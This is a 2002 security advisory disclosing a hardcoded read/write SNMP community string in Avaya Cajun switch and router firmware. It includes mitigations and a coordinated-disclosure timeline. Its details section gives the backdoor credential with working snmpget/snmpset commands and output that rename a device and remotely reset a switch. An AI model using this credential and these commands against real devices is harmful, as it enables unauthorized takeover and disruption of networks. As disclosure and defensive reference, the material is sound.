1. Problem Description There exists an undocumented SNMP r/w community string in firmware for Avaya Cajun P33x series hardware. This allows anyone having SNMP access to the device to administer it. 2. Tested systems The following versions were tested and found vulnerable: Avaya Cajun P330T software version 3.8.2 and 3.9.1 Avaya Cajun P333R software version 3.8.1 and 3.9.1 Additionaly firmware for P130, M770-ATM and M770 Supervisor (M-SPX, M-SPS) was found to be vulnerable. 3. Details Various Cajun firmware contains an undocumented community r/w string NoGaH$@! To test try: sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0 system.sysName.0 = AsnNull sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' system.sysName.0 s 'Hello there :)' system.sysName.0 = Hello there :) sq5bpf@hash:~$ snmpget 192.168.0.3 'NoGaH$@!' system.sysName.0 system.sysName.0 = Hello there :) Reset a Cajun switch remotely (fun party trick): sq5bpf@hash:~$ snmpset 192.168.0.3 'NoGaH$@!' .1.3.6.1.4.1.81.7.7.0 i 1 enterprises.81.7.7.0 = 1 4. Recommendations As always it is good administrative practice to block SNMP at the firewall, especially now after the release of the PROTOS SNMP testing suite. However, the vulnerability is also present on P333R router interfaces, which have a higher chance of being exposed to the outside world: sq5bpf@hash:~$ snmpget 192.168.0.4 'NoGaH$@!' system.sysDescr.0 system.sysDescr.0 = Avaya Inc. - P333R , SW version 3.9.1 , CS 2.4 If for some reason the user is unable to upgrade to a fixed version, in order to mitigate the bug one can restrict SNMP access using the 'set allowed managers' command, which appeared in recent Cajun firmware. 5. Vendor status AVAYA was informed on 27 May 2002. The vendor responded on May 28 2002. As the vendor proved responsive and worked promptly on the problem, I have agreed to release the information after the release of fixed software. The fixed software has been released on July 4, and is avaliable from the Avaya support site http://support.avaya.com. Official AVAYA security advisories are located at http://support.avaya.com/security/ 6. Disclaimer Neither I nor my employer is responsible for the use or misuse of information in this advisory. The opinions expressed are my own and not of any company. Any use of the information is at the user's own risk. Jacek Lipkowski sq5bpf@andra.com.pl Andra Co. Ltd. ul Wynalazek 6 02-677 Warsaw, Poland http://www.andra.com.pl
